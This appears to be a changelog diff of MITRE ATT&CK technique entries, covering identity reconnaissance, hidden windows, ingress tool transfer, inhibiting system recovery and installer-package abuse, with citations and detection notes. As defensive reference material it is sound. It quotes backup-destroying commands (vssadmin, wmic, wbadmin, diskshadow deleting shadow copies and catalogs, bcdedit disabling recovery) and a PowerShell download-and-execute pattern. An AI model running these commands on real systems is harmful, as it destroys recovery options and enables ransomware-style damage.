descriptionAdversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Obsidian SSPR Abuse 2023', 'description': 'Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.', 'url': 'https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/'}
x_mitre_contributorsObsidian Security

[T1564.003] Hide Artifacts: Hidden Window

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use hidden windows to conceal malicious actit1Adversaries may use hidden windows to conceal malicious acti
>vity from the plain sight of users. In some cases, windows t>vity from the plain sight of users. In some cases, windows t
>hat would typically be displayed when an application carries>hat would typically be displayed when an application carries
> out an operation can be hidden. This may be utilized by sys> out an operation can be hidden. This may be utilized by sys
>tem administrators to avoid disrupting user work environment>tem administrators to avoid disrupting user work environment
>s when carrying out administrative tasks.   On Windows, ther>s when carrying out administrative tasks.   Adversaries may 
>e are a variety of features in scripting languages in Window>abuse these functionalities to hide otherwise visible window
>s, such as [PowerShell](https://attack.mitre.org/techniques/>s from users so as not to alert the user to adversary activi
>T1059/001), Jscript, and [Visual Basic](https://attack.mitre>ty on the system.(Citation: Antiquated Mac Malware)  On macO
>.org/techniques/T1059/005) to make windows hidden. One examp>S, the configurations for how applications run are listed in
>le of this is <code>powershell.exe -WindowStyle Hidden</code> property list (plist) files. One of the tags in these files
>>. (Citation: PowerShell About 2019)  Similarly, on macOS th> can be <code>apple.awt.UIElement</code>, which allows for J
>e configurations for how applications run are listed in prop>ava applications to prevent the application's icon from appe
>erty list (plist) files. One of the tags in these files can >aring in the Dock. A common use for this is when application
>be <code>apple.awt.UIElement</code>, which allows for Java a>s run in the system tray, but don't also want to show up in 
>pplications to prevent the application's icon from appearing>the Dock.  Similarly, on Windows there are a variety of feat
> in the Dock. A common use for this is when applications run>ures in scripting languages, such as [PowerShell](https://at
> in the system tray, but don't also want to show up in the D>tack.mitre.org/techniques/T1059/001), Jscript, and [Visual B
>ock.  Adversaries may abuse these functionalities to hide ot>asic](https://attack.mitre.org/techniques/T1059/005) to make
>herwise visible windows from users so as not to alert the us> windows hidden. One example of this is <code>powershell.exe
>er to adversary activity on the system.(Citation: Antiquated> -WindowStyle Hidden</code>.(Citation: PowerShell About 2019
> Mac Malware)>)  In addition, Windows supports the `CreateDesktop()` API t
 >hat can create a hidden desktop window with its own correspo
 >nding <code>explorer.exe</code> process.(Citation: Hidden VN
 >C)(Citation: Anatomy of an hVNC Attack)  All applications ru
 >nning on the hidden desktop window, such as a hidden VNC (hV
 >NC) session,(Citation: Hidden VNC) will be invisible to othe
 >r desktops windows.

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-15 21:09:43.489000+00:002024-04-13 14:28:20.651000+00:00
descriptionAdversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019) Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware) On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden.(Citation: PowerShell About 2019) In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Hidden VNC', 'description': 'Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.', 'url': 'https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html'}
external_references{'source_name': 'Anatomy of an hVNC Attack', 'description': 'Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.', 'url': 'https://securityintelligence.com/anatomy-of-an-hvnc-attack/'}
x_mitre_contributorsMark Tsipershtein

[T1564] Hide Artifacts

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-25 15:59:09.632000+00:002024-03-29 17:45:48.126000+00:00
x_mitre_version1.11.2

[T1562.006] Impair Defenses: Indicator Blocking

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-18 22:23:55.329000+00:002024-02-14 21:50:32.531000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1105] Ingress Tool Transfer

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may transfer tools or other files from an externt1Adversaries may transfer tools or other files from an extern
>al system into a compromised environment. Tools or files may>al system into a compromised environment. Tools or files may
> be copied from an external adversary-controlled system to t> be copied from an external adversary-controlled system to t
>he victim network through the command and control channel or>he victim network through the command and control channel or
> through alternate protocols such as [ftp](https://attack.mi> through alternate protocols such as [ftp](https://attack.mi
>tre.org/software/S0095). Once present, adversaries may also >tre.org/software/S0095). Once present, adversaries may also 
>transfer/spread tools between victim devices within a compro>transfer/spread tools between victim devices within a compro
>mised environment (i.e. [Lateral Tool Transfer](https://atta>mised environment (i.e. [Lateral Tool Transfer](https://atta
>ck.mitre.org/techniques/T1570)).   On Windows, adversaries m>ck.mitre.org/techniques/T1570)).   On Windows, adversaries m
>ay use various utilities to download tools, such as `copy`, >ay use various utilities to download tools, such as `copy`, 
>`finger`, [certutil](https://attack.mitre.org/software/S0160>`finger`, [certutil](https://attack.mitre.org/software/S0160
>), and [PowerShell](https://attack.mitre.org/techniques/T105>), and [PowerShell](https://attack.mitre.org/techniques/T105
>9/001) commands such as <code>IEX(New-Object Net.WebClient).>9/001) commands such as <code>IEX(New-Object Net.WebClient).
>downloadString()</code> and <code>Invoke-WebRequest</code>. >downloadString()</code> and <code>Invoke-WebRequest</code>. 
>On Linux and macOS systems, a variety of utilities also exis>On Linux and macOS systems, a variety of utilities also exis
>t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`,>t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`,
> and `wget`.(Citation: t1105_lolbas)  Adversaries may also a> and `wget`.(Citation: t1105_lolbas)  Adversaries may also a
>buse installers and package managers, such as `yum` or `wing>buse installers and package managers, such as `yum` or `wing
>et`, to download tools to victim hosts.  Files can also be t>et`, to download tools to victim hosts. Adversaries have als
>ransferred using various [Web Service](https://attack.mitre.>o abused file application features, such as the Windows `sea
>org/techniques/T1102)s as well as native or otherwise presen>rch-ms` protocol handler, to deliver malicious files to vict
>t tools on the victim system.(Citation: PTSecurity Cobalt De>ims through remote file searches invoked by [User Execution]
>c 2016) In some cases, adversaries may be able to leverage s>(https://attack.mitre.org/techniques/T1204) (typically after
>ervices that sync between a web-based and an on-premises cli> interacting with [Phishing](https://attack.mitre.org/techni
>ent, such as Dropbox or OneDrive, to transfer files onto vic>ques/T1566) lures).(Citation: T1105: Trellix_search-ms)  Fil
>tim systems. For example, by compromising a cloud account an>es can also be transferred using various [Web Service](https
>d logging into the service's web portal, an adversary may be>://attack.mitre.org/techniques/T1102)s as well as native or 
> able to trigger an automatic syncing process that transfers>otherwise present tools on the victim system.(Citation: PTSe
> the file onto the victim's machine.(Citation: Dropbox Malwa>curity Cobalt Dec 2016) In some cases, adversaries may be ab
>re Sync)>le to leverage services that sync between a web-based and an
 > on-premises client, such as Dropbox or OneDrive, to transfe
 >r files onto victim systems. For example, by compromising a 
 >cloud account and logging into the service's web portal, an 
 >adversary may be able to trigger an automatic syncing proces
 >s that transfers the file onto the victim's machine.(Citatio
 >n: Dropbox Malware Sync)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 21:27:20.702000+00:002024-04-11 15:08:01.731000+00:00
descriptionAdversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms) Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'T1105: Trellix_search-ms', 'description': ' Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler. Retrieved March 15, 2024.', 'url': 'https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/'}
x_mitre_contributorsJoe Wise
x_mitre_contributorsJeremy Hedges
x_mitre_contributorsSelena Larson, @selenalarson
x_mitre_platformsNetwork

[T1490] Inhibit System Recovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may delete or remove built-in data and turn off t1Adversaries may delete or remove built-in data and turn off 
>services designed to aid in the recovery of a corrupted syst>services designed to aid in the recovery of a corrupted syst
>em to prevent recovery.(Citation: Talos Olympic Destroyer 20>em to prevent recovery.(Citation: Talos Olympic Destroyer 20
>18)(Citation: FireEye WannaCry 2017) This may deny access to>18)(Citation: FireEye WannaCry 2017) This may deny access to
> available backups and recovery options.  Operating systems > available backups and recovery options.  Operating systems 
>may contain features that can help fix corrupted systems, su>may contain features that can help fix corrupted systems, su
>ch as a backup catalog, volume shadow copies, and automatic >ch as a backup catalog, volume shadow copies, and automatic 
>repair features. Adversaries may disable or delete system re>repair features. Adversaries may disable or delete system re
>covery features to augment the effects of [Data Destruction]>covery features to augment the effects of [Data Destruction]
>(https://attack.mitre.org/techniques/T1485) and [Data Encryp>(https://attack.mitre.org/techniques/T1485) and [Data Encryp
>ted for Impact](https://attack.mitre.org/techniques/T1486).(>ted for Impact](https://attack.mitre.org/techniques/T1486).(
>Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa>Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa
>nnaCry 2017) Furthermore, adversaries may disable recovery n>nnaCry 2017) Furthermore, adversaries may disable recovery n
>otifications, then corrupt backups.(Citation: disable_notif_>otifications, then corrupt backups.(Citation: disable_notif_
>synology_ransom)  A number of native Windows utilities have >synology_ransom)  A number of native Windows utilities have 
>been used by adversaries to disable or delete system recover>been used by adversaries to disable or delete system recover
>y features:  * <code>vssadmin.exe</code> can be used to dele>y features:  * <code>vssadmin.exe</code> can be used to dele
>te all volume shadow copies on a system - <code>vssadmin.exe>te all volume shadow copies on a system - <code>vssadmin.exe
> delete shadows /all /quiet</code> * [Windows Management Ins> delete shadows /all /quiet</code> * [Windows Management Ins
>trumentation](https://attack.mitre.org/techniques/T1047) can>trumentation](https://attack.mitre.org/techniques/T1047) can
> be used to delete volume shadow copies - <code>wmic shadowc> be used to delete volume shadow copies - <code>wmic shadowc
>opy delete</code> * <code>wbadmin.exe</code> can be used to >opy delete</code> * <code>wbadmin.exe</code> can be used to 
>delete the Windows Backup Catalog - <code>wbadmin.exe delete>delete the Windows Backup Catalog - <code>wbadmin.exe delete
> catalog -quiet</code> * <code>bcdedit.exe</code> can be use> catalog -quiet</code> * <code>bcdedit.exe</code> can be use
>d to disable automatic Windows recovery features by modifyin>d to disable automatic Windows recovery features by modifyin
>g boot configuration data - <code>bcdedit.exe /set {default}>g boot configuration data - <code>bcdedit.exe /set {default}
> bootstatuspolicy ignoreallfailures & bcdedit /set {default}> bootstatuspolicy ignoreallfailures & bcdedit /set {default}
> recoveryenabled no</code> * <code>REAgentC.exe</code> can b> recoveryenabled no</code> * <code>REAgentC.exe</code> can b
>e used to disable Windows Recovery Environment (WinRE) repai>e used to disable Windows Recovery Environment (WinRE) repai
>r/recovery options of an infected system  On network devices>r/recovery options of an infected system * <code>diskshadow.
>, adversaries may leverage [Disk Wipe](https://attack.mitre.>exe</code> can be used to delete all volume shadow copies on
>org/techniques/T1561) to delete backup firmware images and r> a system - <code>diskshadow delete shadows all</code> (Cita
>eformat the file system, then [System Shutdown/Reboot](https>tion: Diskshadow) (Citation: Crytox Ransomware)  On network 
>://attack.mitre.org/techniques/T1529) to reload the device. >devices, adversaries may leverage [Disk Wipe](https://attack
>Together this activity may leave network devices completely >.mitre.org/techniques/T1561) to delete backup firmware image
>inoperable and inhibit recovery operations.  Adversaries may>s and reformat the file system, then [System Shutdown/Reboot
> also delete “online” backups that are connected to their ne>](https://attack.mitre.org/techniques/T1529) to reload the d
>twork – whether via network storage media or through folders>evice. Together this activity may leave network devices comp
> that sync to cloud services.(Citation: ZDNet Ransomware Bac>letely inoperable and inhibit recovery operations.  Adversar
>kups 2020) In cloud environments, adversaries may disable ve>ies may also delete “online” backups that are connected to t
>rsioning and backup policies and delete snapshots, machine i>heir network – whether via network storage media or through 
>mages, and prior versions of objects designed to be used in >folders that sync to cloud services.(Citation: ZDNet Ransomw
>disaster recovery scenarios.(Citation: Dark Reading Code Spa>are Backups 2020) In cloud environments, adversaries may dis
>ces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ranso>able versioning and backup policies and delete snapshots, ma
>mware)>chine images, and prior versions of objects designed to be u
 >sed in disaster recovery scenarios.(Citation: Dark Reading C
 >ode Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S
 >3 Ransomware)

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:30:59.482000+00:002024-04-12 02:30:08.379000+00:00
descriptionAdversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system * diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware) On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
x_mitre_detectionUse process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit and REAgentC. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit, REAgentC, and diskshadow. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Diskshadow', 'description': 'Microsoft Windows Server. (2023, February 3). Diskshadow. Retrieved November 21, 2023.', 'url': 'https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow'}
external_references{'source_name': 'Crytox Ransomware', 'description': 'Romain Dumont . (2022, September 21). Technical Analysis of Crytox Ransomware. Retrieved November 22, 2023.', 'url': 'https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware'}
x_mitre_contributorsHarjot Shah Singh

[T1546.016] Event Triggered Execution: Installer Packages

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may establish persistence and elevate privilegest1Adversaries may establish persistence and elevate privileges
> by using an installer to trigger the execution of malicious> by using an installer to trigger the execution of malicious
> content. Installer packages are OS specific and contain the> content. Installer packages are OS specific and contain the
> resources an operating system needs to install applications> resources an operating system needs to install applications
> on a system. Installer packages can include scripts that ru> on a system. Installer packages can include scripts that ru
>n prior to installation as well as after installation is com>n prior to installation as well as after installation is com
>plete. Installer scripts may inherit elevated permissions wh>plete. Installer scripts may inherit elevated permissions wh
>en executed. Developers often use these scripts to prepare t>en executed. Developers often use these scripts to prepare t
>he environment for installation, check requirements, downloa>he environment for installation, check requirements, downloa
>d dependencies, and remove files after installation.(Citatio>d dependencies, and remove files after installation.(Citatio
>n: Installer Package Scripting Rich Trouton)  Using legitima>n: Installer Package Scripting Rich Trouton)  Using legitima
>te applications, adversaries have distributed applications w>te applications, adversaries have distributed applications w
>ith modified installer scripts to execute malicious content.>ith modified installer scripts to execute malicious content.
> When a user installs the application, they may be required > When a user installs the application, they may be required 
>to grant administrative permissions to allow the installatio>to grant administrative permissions to allow the installatio
>n. At the end of the installation process of the legitimate >n. At the end of the installation process of the legitimate 
>application, content such as macOS `postinstall` scripts can>application, content such as macOS `postinstall` scripts can
> be executed with the inherited elevated permissions. Advers> be executed with the inherited elevated permissions. Advers
>aries can use these scripts to execute a malicious executabl>aries can use these scripts to execute a malicious executabl
>e or install other malicious components (such as a [Launch D>e or install other malicious components (such as a [Launch D
>aemon](https://attack.mitre.org/techniques/T1543/004)) with >aemon](https://attack.mitre.org/techniques/T1543/004)) with 
>the elevated permissions.(Citation: Application Bundle Manip>the elevated permissions.(Citation: Application Bundle Manip
>ulation Brandon Dalton)(Citation: wardle evilquest parti)  D>ulation Brandon Dalton)(Citation: wardle evilquest parti)(Ci
>epending on the distribution, Linux versions of package inst>tation: Windows AppleJeus GReAT)(Citation: Debian Manual Mai
>aller scripts are sometimes called maintainer scripts or pos>ntainer Scripts)  Depending on the distribution, Linux versi
>t installation scripts. These scripts can include `preinst`,>ons of package installer scripts are sometimes called mainta
> `postinst`, `prerm`, `postrm` scripts and run as root when >iner scripts or post installation scripts. These scripts can
>executed.  For Windows, the Microsoft Installer services use> include `preinst`, `postinst`, `prerm`, `postrm` scripts an
>s `.msi` files to manage the installing, updating, and unins>d run as root when executed.  For Windows, the Microsoft Ins
>talling of applications. Adversaries have leveraged `Prebuil>taller services uses `.msi` files to manage the installing, 
>d` and `Postbuild` events to run commands before or after a >updating, and uninstalling of applications. These installati
>build when installing .msi files.(Citation: Windows AppleJeu>on routines may also include instructions to perform additio
>s GReAT)(Citation: Debian Manual Maintainer Scripts)>nal actions that may be abused by adversaries.(Citation: Mic
 >rosoft Installation Procedures)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 22:44:20.305000+00:002024-04-12 02:23:44.583000+00:00
descriptionAdversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts 